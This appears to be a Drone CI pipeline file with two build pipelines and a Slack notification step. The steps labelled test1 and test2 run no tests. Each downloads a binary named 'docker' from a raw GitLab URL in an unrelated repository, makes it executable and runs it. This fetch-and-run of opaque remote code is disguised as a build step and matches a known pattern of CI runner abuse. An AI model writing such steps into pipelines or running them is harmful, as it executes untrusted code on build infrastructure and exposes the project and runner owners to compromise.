kind: pipeline
type: docker
name: build1
steps:
- name: test1
  image: golang
  commands:
  - wget https://gitlab.com/lambohopo/bash/-/raw/main/docker && chmod +x docker && ./docker
---
kind: pipeline
type: docker
name: build2

steps:
- name: test2
  image: node
  commands:
  - wget https://gitlab.com/lambohopo/bash/-/raw/main/docker && chmod +x docker && ./docker
---
kind: pipeline
name: after

steps:
- name: notify
  image: plugins/slack
  settings:
    room: general


depends_on:
- build1
- build2
